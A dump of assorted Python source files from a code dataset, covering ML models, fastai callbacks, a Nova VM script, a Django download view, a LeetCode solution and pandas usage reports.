X.shape[1] != len(self.w) - 1:\n raise AssertionError(\n f\"Perceptron was trained on X with {len(self.w)}\",\n \"columns but test has X with {X.shape[1]} columns\",\n )\n\n X1 = np.insert(X, X.shape[1], 1, axis=1)\n yhat = (X1.dot(self.w) > 0).astype(\"int64\")\n preds = self.target_classes[yhat]\n\n return preds\n","sub_path":"perceptron_learning_algo.py","file_name":"perceptron_learning_algo.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"625297403","text":"from setuptools import setup, find_packages\nimport codecs\nimport sys, os\nsys.path.insert(0,'src/')\ninit_pyc = 'src/qam/__init__.pyc'\nif os.path.exists(init_pyc):\n os.remove(init_pyc)\n\nimport qam\n\n\nif os.path.exists(\"doc/source/introduction.rst\"):\n long_description = codecs.open('doc/source/introduction.rst', \"r\", \"utf-8\").read()\nelse:\n long_description = \"See \" + qam.__homepage__\n\nsetup(\n name = \"qam\",\n version = qam.__version__,\n packages = find_packages('src'),\n package_dir = {'':'src'},\n install_requires = ['carrot>=0.6'],\n \n \n # metadata for upload to PyPI\n author = qam.__author__,\n author_email = qam.__contact__,\n description = qam.__doc__,\n long_description=long_description,\n keywords = \"rpc amqp\",\n platforms=[\"any\"],\n url = qam.__homepage__,\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"License :: OSI Approved :: BSD License\",\n \"Intended Audience :: Developers\",\n \"Topic :: Communications\",\n \"Topic :: System :: Distributed Computing\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n \n\n)\n\n","sub_path":"pypi_install_script/qam-0.2.18.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"89059700","text":"import click\nimport sklearn.metrics\nimport numpy as np\n\nimport logging\n\nimport helpers\nfrom config import baseline_configurations\nfrom create_model import Model # NOQA\n\n\nclass Baseline:\n def __init__(self, config, input_file=None, input_model=None):\n self.config = config\n self.persistence_path = self.config.PATHS.predictions\n\n if input_file is None and input_model is None:\n self.input_file = helpers.find_latest_file(self.config.PATHS.models)\n self.load_model()\n elif input_file is None and input_model is not None:\n self.model = input_model\n elif input_file is not None and input_model is not None:\n logging.warning('Both an input model file and an input Model object were provided. Using the object.')\n self.model = input_model\n elif input_file is not None and input_model is None:\n self.input_file = click.format_filename(input_file)\n self.load_model()\n\n def load_model(self):\n if hasattr(self, 'input_file'):\n logging.info('Loading model {}...'.format(self.input_file))\n else:\n logging.info('Loading model from object...')\n\n self.model = helpers.load_input_file(self.input_file)\n\n def run(self):\n logging.info('Calculating MAE for baseline models...')\n\n actual_ltv = self.model.y_train\n first_order_net_order_value = self.model.dataset.data_train['first_order_net_order_value']\n model_cv_mae = self.model.model_cv_mae\n\n length = len(actual_ltv)\n avg = np.mean(actual_ltv)\n dummy_avg = [avg]*length\n mae_dummy_avg = sklearn.metrics.mean_absolute_error(actual_ltv, dummy_avg)\n\n dummy_first_order = first_order_net_order_value.apply(lambda x: x*3)\n mae_dummy_first_order = sklearn.metrics.mean_absolute_error(actual_ltv, dummy_first_order)\n\n print(model_cv_mae)\n print('Average LTV Prediction Dummy Model MAE: ' + str(mae_dummy_avg))\n print('First Order * Average Order Per User Dummy Model MAE: ' + str(mae_dummy_first_order))\n\n\n@click.command()\n@click.option('--input_file', type=click.Path(exists=True, dir_okay=False))\n@click.option('--config', default='production')\ndef main(input_file, config):\n logging.info('Creating Baseline Models...')\n\n configuration = helpers.get_configuration(config, baseline_configurations)\n\n baseline = Baseline(config=configuration, input_file=input_file)\n\n baseline.run()\n\n\nif __name__ == '__main__':\n logger = helpers.get_logger()\n main()\n","sub_path":"baselines.py","file_name":"baselines.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236734255","text":"# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016\n\n\"\"\"YOLO-tiny.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom config import model_config\nimport util\nfrom easydict import EasyDict as edict\nimport numpy as np\nimport tensorflow as tf\nfrom yolo_model import YoloModel\n\nclass YoloVGG16Model(YoloModel):\n def __init__(self, mc):\n mc.LEAKY_COEF = 0 # Set the leaky coefficient to 0 for VGG16\n\n YoloModel.__init__(self, mc)\n\n self._add_inference_graph()\n self._add_loss_graph()\n self._add_train_graph()\n\n def _add_inference_graph(self):\n \"\"\"Build the VGG-16 model.\"\"\"\n\n mc = self.mc\n\n with tf.variable_scope('conv1') as scope:\n conv1_1 = self._conv_layer(\n 'conv1_1', self.image_input, filters=64, size=3, stride=1)\n conv1_2 = self._conv_layer(\n 'conv1_2', conv1_1, filters=64, size=3, stride=1)\n pool1 = self._pooling_layer(\n 'pool1', conv1_2, size=2, stride=2)\n\n with tf.variable_scope('conv2') as scope:\n conv2_1 = self._conv_layer(\n 'conv2_1', pool1, filters=128, size=3, stride=1)\n conv2_2 = self._conv_layer(\n 'conv2_2', conv2_1, filters=128, size=3, stride=1)\n pool2 = self._pooling_layer(\n 'pool2', conv2_2, size=2, stride=2)\n\n with tf.variable_scope('conv3') as scope:\n conv3_1 = self._conv_layer(\n 'conv3_1', pool2, filters=256, size=3, stride=1)\n conv3_2 = self._conv_layer(\n 'conv3_2', conv3_1, filters=256, size=3, stride=1)\n conv3_3 = self._conv_layer(\n 'conv3_3', conv3_2, filters=256, size=3, stride=1)\n pool3 = self._pooling_layer(\n 'pool3', conv3_3, size=2, stride=2)\n\n with tf.variable_scope('conv4') as scope:\n conv4_1 = self._conv_layer(\n 'conv4_1', pool3, filters=512, size=3, stride=1)\n conv4_2 = self._conv_layer(\n 'conv4_2', conv4_1, filters=512, size=3, stride=1)\n conv4_3 = self._conv_layer(\n 'conv4_3', conv4_2, filters=512, size=3, stride=1)\n pool4 = self._pooling_layer(\n 'pool4', conv4_3, size=2, stride=2)\n\n with tf.variable_scope('conv5') as scope:\n conv5_1 = self._conv_layer(\n 'conv5_1', pool4, filters=512, size=3, stride=1)\n conv5_2 = self._conv_layer(\n 'conv5_2', conv5_1, filters=512, size=3, stride=1)\n conv5_3 = self._conv_layer(\n 'conv5_3', conv5_2, filters=512, size=3, stride=1)\n pool5 = self._pooling_layer(\n 'pool5', conv5_3, size=2, stride=2)\n\n with tf.variable_scope('fc') as scope:\n fc6 = self._fc_layer('fc6', pool5, 4096, flatten=True)\n dropout6 = tf.nn.dropout(fc6, self.keep_prob, name='drop6')\n fc7 = self._fc_layer('fc7', dropout6, 4096)\n dropout7 = tf.nn.dropout(fc7, self.keep_prob, name='drop7')\n\n num_output = mc.GWIDTH * mc.GHEIGHT * (mc.CLASSES + (1 + 4))\n preds = self._fc_layer('output', dropout7, num_output, activation=True)\n\n self.preds = preds\n","sub_path":"src/yolo_vgg16.py","file_name":"yolo_vgg16.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"194090641","text":"\"\"\"\r\nProvides high-level functions for fetching stuff from the internet.\r\n\"\"\"\r\n\r\nimport shutil\r\nimport requests\r\n\r\n\r\nclass DownloaderError(Exception):\r\n \"\"\"\r\n Errors related to the Downloader\r\n \"\"\"\r\n\r\n\r\nclass Downloader:\r\n \"\"\"\r\n Provides high-level functions for fetching stuff from the internet.\r\n \"\"\"\r\n\r\n ##################################################\r\n # GET REQUEST\r\n ##################################################\r\n\r\n @staticmethod\r\n def get(url):\r\n \"\"\"\r\n Send a GET request to the given URL.\r\n\r\n Parameters:\r\n url: The URL.\r\n\r\n Returns:\r\n response: The requests library response.\r\n error: The error that was generated. None if the request was successful.\r\n \"\"\"\r\n\r\n response = None\r\n error = None\r\n\r\n try:\r\n # Fetch the data.\r\n response = requests.get(url)\r\n # Raise exception if any.\r\n response.raise_for_status()\r\n # If there were no exceptions, the download was successful.\r\n except Exception as err: # pylint: disable=broad-except\r\n error = err\r\n\r\n return response, error\r\n\r\n ##################################################\r\n # DOWNLOAD IMAGE\r\n ##################################################\r\n\r\n @staticmethod\r\n def downloadImage(url, outputPath):\r\n \"\"\"\r\n Download an image to the given path.\r\n\r\n Parameters:\r\n url (str): The image URL.\r\n outputPath (str): The full path (including filename) of the image.\r\n\r\n Returns:\r\n An exception if the download failed. None if the download was a success.\r\n \"\"\"\r\n error = None\r\n try:\r\n response = requests.get(url, stream=True)\r\n if response.status_code != 200:\r\n raise DownloaderError(f'Error: Status code {response.status_code}')\r\n with open(outputPath, 'wb') as outputFile:\r\n shutil.copyfileobj(response.raw, outputFile)\r\n del response\r\n except Exception as err: # pylint: disable=broad-except\r\n error = err\r\n return error\r\n\r\n ##################################################\r\n # GET ERROR STRING\r\n ##################################################\r\n\r\n @staticmethod\r\n def getErrorString(err):\r\n \"\"\"\r\n Get the description of the error.\r\n\r\n Parameters:\r\n err: The error.\r\n\r\n Returns:\r\n The description of the error.\r\n \"\"\"\r\n desc = None\r\n try:\r\n raise err\r\n except requests.exceptions.HTTPError as err:\r\n desc = 'An HTTP error occurred.'\r\n except requests.exceptions.ProxyError as err:\r\n desc = 'A proxy error occurred.'\r\n except requests.exceptions.SSLError as err:\r\n desc = 'An SSL error occurred.'\r\n except requests.exceptions.ConnectTimeout as err:\r\n desc = 'The request timed out while trying to connect to the remote server.'\r\n except requests.exceptions.ReadTimeout as err:\r\n desc = 'The server did not send any data in the allotted amount of time.'\r\n except requests.exceptions.Timeout as err:\r\n desc = 'The request timed out.'\r\n except requests.exceptions.ConnectionError as err:\r\n desc = 'A Connection error occurred.'\r\n except requests.exceptions.URLRequired as err:\r\n desc = 'A valid URL is required to make a request.'\r\n except requests.exceptions.TooManyRedirects as err:\r\n desc = 'Too many redirects.'\r\n except requests.exceptions.MissingSchema as err:\r\n desc = 'The URL schema (e.g. http or https) is missing.'\r\n except requests.exceptions.InvalidSchema as err:\r\n desc = 'The URL schema is invalid.'\r\n except requests.exceptions.InvalidHeader as err:\r\n desc = 'The header value provided was somehow invalid.'\r\n except requests.exceptions.InvalidProxyURL as err:\r\n desc = 'The proxy URL provided is invalid.'\r\n except requests.exceptions.InvalidURL as err:\r\n desc = 'The URL provided was somehow invalid.'\r\n except Exception as err: # pylint: disable=broad-except\r\n desc = 'An unexpected error occurred.'\r\n return desc\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440448094","text":"\"\"\"\nLeetCode\nPython3\n-*- coding: utf-8 -*-\n\n@Problem : 291. Word Pattern II.py\n@Difficulty : \n\n@AUTHOR : Yvette WANG\n\n@Description\n\"\"\"\n\nfrom copy import deepcopy\n\n\n# hard, v1, brute-force + dynamic programming, 7476ms, 229.8 MB\nclass Solution(object):\n def wordPatternMatch(self, pattern, str):\n \"\"\"\n :type pattern: str\n :type str: str\n :rtype: bool\n \"\"\"\n\n symbol_chars = {}\n self.visited = {}\n\n return self.guess_component(pattern, str, symbol_chars)\n\n def guess_component(self, remain_pattern, remain_str, symbol_chars):\n if len(remain_pattern) == 0 and len(remain_str) == 0:\n return True\n elif len(remain_pattern) != 0 and len(remain_str) != 0:\n if self.visited.get((remain_pattern, remain_str, tuple(symbol_chars.items())), 0) == 0:\n if symbol_chars.get(remain_pattern[0], 0) == 0:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n for length in range(1, len(remain_str) + 1):\n if (remain_str[:length], length) not in symbol_chars.values():\n symbol_chars_temp = deepcopy(symbol_chars)\n symbol_chars_temp[remain_pattern[0]] = (remain_str[:length], length)\n if self.guess_component(remain_pattern[1:], remain_str[length:], symbol_chars_temp):\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = True\n break\n else:\n if symbol_chars[remain_pattern[0]][0] == remain_str[:symbol_chars[remain_pattern[0]][1]]:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = \\\n self.guess_component(remain_pattern[1:], remain_str[symbol_chars[remain_pattern[0]][1]:],\n symbol_chars)\n else:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n else:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n\n return self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))]\n\n\nif __name__ == \"__main__\":\n pattern = \"abab\"\n str = \"redblueredblue\"\n\n # pattern = \"aaaa\"\n # str = \"asdasdasdasd\"\n #\n # pattern = \"aabb\"\n # str = \"xyzabcxzyabc\"\n #\n # pattern = 'd'\n # str = 'e'\n #\n # pattern = \"ab\"\n # str = \"aa\"\n\n print(Solution().wordPatternMatch(pattern, str))","sub_path":"291. Word Pattern II.py","file_name":"291. Word Pattern II.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184470697","text":"'''\ndef hellocounter (name):\n count=[0] \n def counter():\n count[0]+=1\n print 'Hello,',name,',',str(count[0])+' access!'\n return counter\n\nhello = hellocounter('ma6174')\nhello()\nhello()\nhello()\n'''\n#±Õ°ü\ndef deco(func):\n print(\"before myfunc() called.\")\n func()\n print(\" after myfunc() called.\")\n return func\n \ndef myfunc():\n print(\" myfunc() called.\")\n \nmyfunc = deco(myfunc)\n \nmyfunc()\nmyfunc()\n","sub_path":"zqx_python/main/bibao.py","file_name":"bibao.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431943329","text":"import csv\nimport pandas as pd\n\n\nclass HOperator:\n\n def __init__(self):\n # self.name_of_directory = 'test/'\n self.name_of_directory = 'Assignment with a cellular operator/'\n self.new_directory = 'New log files/'\n self.result_directory = 'Result/'\n\n def chunkIt(self, seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n\n return out\n\n def reducer(self, log_file):\n df = pd.read_csv(log_file)\n df = df.pivot_table(values='Speed', index='Day', aggfunc='median')\n return df\n\n def process_files(self, log_file):\n old_log_file = self.name_of_directory + log_file\n new_log_file = self.new_directory + log_file\n with open(old_log_file, newline='') as File:\n with open(new_log_file, 'w', newline='') as NewFile:\n day = 1\n reader = csv.reader(File, delimiter=',')\n writer = csv.writer(NewFile, delimiter=',')\n\n writer.writerow([\"Day\", 'Time', 'Speed'])\n next(reader) # Пропускаем первую строку\n first_row = next(reader)\n first_minute, speed = int(float(first_row[1][1:]) / 60), float(\n first_row[2][1:]) # Получаем первый отсчёт и количество байт\n\n number_speeds_in_minute = 1\n\n for row in reader:\n minute = int(float(row[1][1:]) / 60)\n\n if int(row[0]) != day or minute != first_minute:\n average_in_minute = speed / number_speeds_in_minute\n writer.writerow([day, first_minute, average_in_minute])\n first_minute = minute\n day = int(row[0])\n speed = 0\n speed += float(row[2][1:])\n number_speeds_in_minute = 1\n else:\n speed += float(row[2][1:])\n number_speeds_in_minute += 1\n\n average_in_minute = speed / number_speeds_in_minute\n writer.writerow([day, first_minute, average_in_minute])\n\n def chunk_process(self, chunk):\n list(map(self.process_files, chunk))\n\n def chunks_mapper(self, chunk):\n name_of_h = chunk[0].split('.')[1]\n general_df = pd.read_csv(self.new_directory + chunk.pop())\n\n for i in chunk:\n df = pd.read_csv(self.new_directory + i)\n general_df = pd.concat([df, general_df], axis=0)\n\n general_df = general_df.groupby(['Day', 'Time']).sum()\n new_name_of_file = 'Result/' + name_of_h + '.csv'\n general_df.to_csv(new_name_of_file)\n return self.reducer(new_name_of_file)\n\n def chunk_max_speed(self, chunk):\n df = pd.read_csv(self.result_directory + chunk[0])\n df = df.groupby([\"Day\"])[\"Speed\"].max()\n return df\n\n def chunk_sum_max_speed(self, chunk):\n key_of_chunk = list(chunk.keys())[0]\n df = pd.read_csv(self.result_directory + key_of_chunk+'.csv')\n week = chunk[key_of_chunk]\n h_sum_speed = chunk\n for day in range(1, 8):\n df_i = df.where(df['Day'] == day).where(df['Speed'] > float(week[day]))['Speed'].sum()\n h_sum_speed[key_of_chunk][day] = df_i\n\n return h_sum_speed\n\n\n\n\n\n","sub_path":"map_reduce_operator.py","file_name":"map_reduce_operator.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465277585","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport time\n# Please Check if novaclient was installed.\ntry:\n import novaclient.v1_1.client as nvclient\nexcept:\n print('Please install Nova client first.')\n sys.exit(1)\n\n# The QMULUS access URL.\nauth_url = 'https://172.16.17.1:5000/v2.0'\n# Tenant name for the user.\nproject_id = 'myproject'\n# User name who crearted the searching VM\nusername = 'demo'\n# Password of username.\napi_key = 'demo'\n# SSL Key to communicate with QMULUS.\ncacert = '/home/ubuntu/arcus_ca.pem'\n# Name of your Instance(VM) to be created.\nvm_name = 'demo-vm'\n# Image Name to create the Instance.\nimage_name = 'ubuntu_12.04-pwd'\n# Network Name to be used by the Instance of the user Tenant.\nnetwork_name = 'net_demo'\n# Flavor of the creating Instance.\nflavor_name = 'm1.small'\n# KeyPair Name\nkeypair_name = 'my_keypair'\n# Floating IP pool name\nfip_pool_name = 'net_external'\n\n\n# Create a nova client.\nnova = nvclient.Client(auth_url=auth_url, username=username,\n api_key=api_key, project_id=project_id,\n cacert=cacert)\n\n# Get information of all images.\n#nova_images = nova.images.list()\n# Get information of all networks of the tenant.\n#nova_networks = nova.networks.list()\n# Get information of all flavors.\n#nova_flavors = nova.flavors.list()\n\n# Get ID of the image.\nimage = nova.images.find(name=image_name)\nimage_id = image.id\nimage_resp_name = image.name\n# Get ID of the network.\nnet = nova.networks.find(label=network_name)\nnet_id = net.id\nnet_resp_name = net.label\n# Get ID of the flavor.\nflavor = nova.flavors.find(name=flavor_name)\nflavor_id = flavor.id\nflavor_resp_name = flavor.name\n\n# Allocate a new Floating IP address.\nnew_fip = nova.floating_ips.create(pool=fip_pool_name)\n\n\"\"\"\n# List all floating IP and you can choose a free one to assocaite.\nfip_list = nova.floating_ips.list()\nfor fip in fip_list:\n print '-' * 100\n print fip.id\n print fip.ip\n print(\"instance_id : %s\" % fip.instance_id)\n print(\"pool : %s\" % fip.pool)\n\"\"\"\n\n# Start to create an instance.\nnics = [{'net-id': net_id}]\ninstance = nova.servers.create(name=vm_name, image=image,\n flavor=flavor, nics=nics)\n# If you want to use Key to access your instance.\n #, key_name=keypair_name)\n\n# Check if instance is created and ok.\ntime.sleep(10)\n# Make Sure name is Unique or use id for search.\nserver = nova.servers.find(name=vm_name)\nprint('Instance: %s, status: %s' % (vm_name, str(server.status)))\n\n# Assocaite floating ip to the Instance.\nnova.servers.add_floating_ip(server, new_fip.ip)\n\ntime.sleep(5)\n\n# Delete the Instance.\nserver.delete()\n\ntime.sleep(5)\n\n# Delete the Allocated floating IP\nnova.floating_ips.delete(new_fip.id)\n","sub_path":"nova/python/sample_nova_create_vm_cmd01.py","file_name":"sample_nova_create_vm_cmd01.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380716576","text":"import os, re\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import render\nfrom django.views.static import serve\n\n# Create your views here.\n\ndef index(request):\n suffixes = [\".mkv\", \".avi\", \".mp4\", \".m4v\"]\n context = {\n 'films' : []\n }\n for directory in sorted(os.listdir(settings.MEDIA_ROOT)):\n film = {}\n film['directory'] = directory\n film['filename'] = \"\"\n for f in os.listdir(settings.MEDIA_ROOT + \"/\" + directory):\n for suffix in suffixes:\n if f.endswith(suffix):\n film['filename'] = f\n context['films'].append(film)\n return render(request, 'display/index.html', context)\n\ndef download(request, directory, filename):\n filepath = settings.MEDIA_ROOT + directory + \"/\" + filename\n with open(\"/log.txt\", \"a\") as f:\n timestr = datetime.strftime(datetime.now(), \"%y%m%d%H%M%S\")\n f.write(\"%s Downloading %s...\\n\" % (timestr, str(filename)))\n f.close()\n return serve(request, os.path.basename(filepath), os.path.dirname(filepath))\n","sub_path":"display/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12265596","text":"def factOrSum(x, word):\r\n\r\n total = 1\r\n\r\n if word == \"factorial\":\r\n for i in range (1, x + 1):\r\n total = total * i\r\n\r\n return total\r\n\r\n else:\r\n\r\n total = 0\r\n\r\n for i in range (0, x + 1):\r\n total = total + i\r\n\r\n return total\r\n\r\nprint(factOrSum(5, \"sum\"))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600804236","text":"import json\n\nimport torch\nimport numpy as np\n\nfrom fastai.torch_core import *\n\nfrom fastai import *\nfrom fastai.vision import *\n\nfrom myfastai import MyLearner, LearnerCallback\n\n\n@dataclass\nclass TrackerCallback(LearnerCallback):\n \"A `LearnerCallback` that keeps track of the best value in `monitor`.\"\n monitor: str = 'val_loss'\n mode: str = 'auto'\n\n def __post_init__(self):\n super().__post_init__()\n\n if self.mode not in ['auto', 'min', 'max']:\n warn(\n f'{self.__class__} mode {self.mode} is invalid, falling back to \"auto\" mode.')\n self.mode = 'auto'\n mode_dict = {'min': np.less, 'max': np.greater}\n mode_dict['auto'] = np.less if 'loss' in self.monitor else np.greater\n self.operator = mode_dict[self.mode]\n\n def on_train_begin(self, **kwargs: Any)->None:\n self.best = float('inf') if self.operator == np.less else -float('inf')\n\n def get_monitor_value(self):\n values = {'trn_loss': self.learn.recorder.losses[-1:][0].cpu().numpy(),\n 'val_loss': self.learn.recorder.val_losses[-1:][0]}\n for i, name in enumerate(self.learn.recorder.names[3:]):\n values[name] = self.learn.recorder.metrics[-1:][0][i]\n if values.get(self.monitor) is None:\n warn(\n f'{self.__class__} conditioned on metric `{self.monitor}` which is not available. Available metrics are: {\", \".join(map(str, self.learn.recorder.names[1:]))}')\n return values.get(self.monitor)\n\n\n@dataclass\nclass EarlyStoppingCallback(TrackerCallback):\n \"A `LearnerCallback` that terminates training when monitored quantity stops improving.\"\n min_delta: int = 0\n patience: int = 0\n\n def __post_init__(self):\n super().__post_init__()\n if self.operator == np.less:\n self.min_delta *= -1\n\n def on_train_begin(self, **kwargs: Any)->None:\n self.wait = 0\n super().on_train_begin(**kwargs)\n\n def on_epoch_end(self, epoch, **kwargs: Any)->None:\n current = self.get_monitor_value()\n if current is None:\n return\n if self.operator(current - self.min_delta, self.best):\n self.best, self.wait = current, 0\n else:\n self.wait += 1\n if self.wait >= self.patience:\n print(f'Epoch {epoch}: early stopping')\n return True\n\n\n@dataclass\nclass SaveModelCallback(TrackerCallback):\n \"A `LearnerCallback` that saves the model when monitored quantity is best.\"\n every: str = 'improvement'\n name: str = 'bestmodel'\n\n def __post_init__(self):\n super().__post_init__()\n\n def on_epoch_end(self, epoch, **kwargs: Any)->None:\n if isinstance(self.every, int):\n if (epoch % self.every) == 0:\n self.learn.save(f'{self.name}_{epoch}')\n else: # every=\"improvement\"\n current = self.get_monitor_value()\n if current is not None and self.operator(current, self.best):\n self.best = current\n self.learn.save(f'{self.name}_{self.monitor}')\n\n def on_train_end(self, **kwargs):\n if self.every == \"improvement\":\n self.learn.load(f'{self.name}_{self.monitor}')\n\n\n@dataclass\nclass SavePredictionCallback(TrackerCallback):\n \"A `LearnerCallback` that saves the model when monitored quantity is best.\"\n\n record_folder: str = None\n ylookup: List = None\n every: str = 'improvement'\n\n def __post_init__(self):\n super().__post_init__()\n\n def on_epoch_begin(self, **kwargs):\n self.outputs = []\n\n def on_batch_end(self, last_output: Tensor, train, **kwargs):\n\n if train is False:\n output = torch.exp(last_output).detach().cpu().numpy()\n\n self.outputs.append(output)\n\n def on_epoch_end(self, epoch, train, **kwargs: Any)->None:\n if train is False:\n if isinstance(self.every, int):\n if (epoch % self.every) == 0:\n ######\n total_output = np.concatenate(\n self.outputs, axis=0).tolist()\n\n with open(self.record_folder + 'predictions' + '_' + str(epoch) + '.json', 'w') as f:\n json.dump(total_output, f)\n else:\n current = self.get_monitor_value()\n if current is not None and self.operator(current, self.best):\n self.best = current\n\n ######\n total_output = np.concatenate(\n self.outputs, axis=0).tolist()\n\n with open(self.record_folder + 'predictions_' + self.monitor + '.json', 'w') as f:\n json.dump(total_output, f)\n","sub_path":"uncased-baseline/zheng/tracktrack.py","file_name":"tracktrack.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552481686","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 1 06:49:13 2019\r\npip install fuzzywuzzy\r\n\r\n\r\nhttps://marcobonzanini.com/2015/02/25/fuzzy-string-matching-in-python/\r\n\r\n@author: rzhou11\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\nimport datetime\r\n\r\ntoday=datetime.date.today()\r\n#print(today)\r\nthis_month=int(str(today)[5:7])\r\n#print(type(this_month))\r\n#9 0).sum(), axis=1)-1\r\n\r\ndf['No. of Month Used']=df_count\r\n\r\ndf['Monthly average']=round(df_sum/df_count)\r\n\r\ndf=df.sort_values('Monthly average', ascending = False)\r\n\r\nuser_monthly=MonthOrdered(df)\r\n\r\nuser_monthly.to_excel(writer,sheet_name='2018 user monthly')\r\n\r\n\r\n##--------------------2019---------------------------------------------\r\n\r\n\r\njobs=jobs2019\r\n\r\n\r\n\r\n#-------------------- Smaples per instrument per month ------------------------\r\n\r\ninstrument_monthly = jobs.groupby('Instrument').resample('M')[y_data].count()\r\ndf=instrument_monthly\r\n\r\ndf= df.reset_index()\r\n\r\ndf[time_index]= df[time_index].dt.strftime('%b')\r\n\r\ndf = df.pivot(index='Instrument',columns='Date modified',values='File Name')\r\n\r\ninstrument_monthly=MonthOrdered(df)\r\n\r\ninstrument_monthly.to_excel(writer,sheet_name='2019 instrument monthly')\r\n\r\n\r\n\r\n\r\n##--------------------Yearly total jobs----------------------\r\nyearly2019=jobs.resample('Y').count()\r\n#print('Total samples for the year of 2019: '+str(yearly2019[y_data][0])+'!')\r\nyearly2019[y_data].to_excel(writer,sheet_name='2019 yearly')\r\n\r\n##--------------------Monthly total jobs----------------------\r\n\r\nmonthly = jobs.resample('M').count() # count monthly total number of jobs\r\nmonthly.reset_index(inplace= True)\r\n#monthly['Month']= monthly[time_index].dt.strftime('%Y-%m')\r\n\r\nmonthly['Month']= monthly[time_index].dt.strftime('%b')\r\n#print(monthly['Month'])\r\nmonthly2019=monthly[['Month','File Name']]\r\n\r\n#print('Monthly samples for the year of 2019: \\n'+ str(monthly2019[y_data]))\r\n\r\n\r\nmonthly2019.to_excel(writer,sheet_name='2019 monthly',index=False)\r\n\r\n##--------------------Hourly total jobs----------------------\r\nhourly = jobs.resample('H').count() # count hourly jobs for each day\r\nhourly.reset_index(inplace= True)\r\nhourly['hours'] = hourly[time_index].dt.hour # extract hours from the datetime\r\nhourly_group = hourly.groupby('hours')[y_data].sum()\r\n\r\nhourly_group.to_excel(writer,sheet_name='2019 hourly')\r\n\r\n#print(hourly_group)\r\n\r\n\r\n#-------------------- Total jobs per weekday ------------------------\r\ndays = jobs.resample('D').count()\r\ndays.reset_index(inplace = True)\r\ndays['weekday'] = days[time_index].dt.strftime('%a')\r\ndays_group = days.groupby('weekday')[y_data].sum().reindex(weekday_order)\r\n\r\n#days_group = days.groupby('weekday')[y_data].sum().sort_values(ascending=False)\r\n\r\n\r\ndays_group.to_excel(writer,sheet_name='2019 weekday')\r\n\r\n\r\n\r\n#--------------group by month and user----------------------------\r\n\r\nuser_monthly = jobs.groupby('User_edited').resample('M')[y_data].count()\r\n\r\ndf=user_monthly\r\n\r\ndf = df.reset_index()\r\n\r\ndf[time_index]= df[time_index].dt.strftime('%b')\r\n\r\ndf=df.pivot(index='User_edited',columns='Date modified',values='File Name')\r\n\r\n\r\ndf_sum=df.sum(axis=1)\r\n\r\ndf['Total samples']=df_sum\r\n\r\ndf_count=df.apply(lambda s: (s > 0).sum(), axis=1)-1\r\n\r\ndf['No. of Month Used']=df_count\r\n\r\ndf['Monthly average']=round(df_sum/df_count)\r\n\r\ndf=df.sort_values('Monthly average', ascending = False)\r\n\r\nuser_monthly=MonthOrdered(df)\r\n\r\nuser_monthly.to_excel(writer,sheet_name='2019 user monthly')\r\n\r\n\r\n\r\nwriter.save()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#http://strftime.org/\r\n#Code\tMeaning\tExample\r\n#%a\tWeekday as locale’s abbreviated name.\tMon\r\n#%A\tWeekday as locale’s full name.\tMonday\r\n#%w\tWeekday as a decimal number, where 0 is Sunday and 6 is Saturday.\t1\r\n#%d\tDay of the month as a zero-padded decimal number.\t30\r\n#%-d\tDay of the month as a decimal number. (Platform specific)\t30\r\n#%b\tMonth as locale’s abbreviated name.\tSep\r\n#%B\tMonth as locale’s full name.\tSeptember\r\n#%m\tMonth as a zero-padded decimal number.\t09\r\n#%-m\tMonth as a decimal number. (Platform 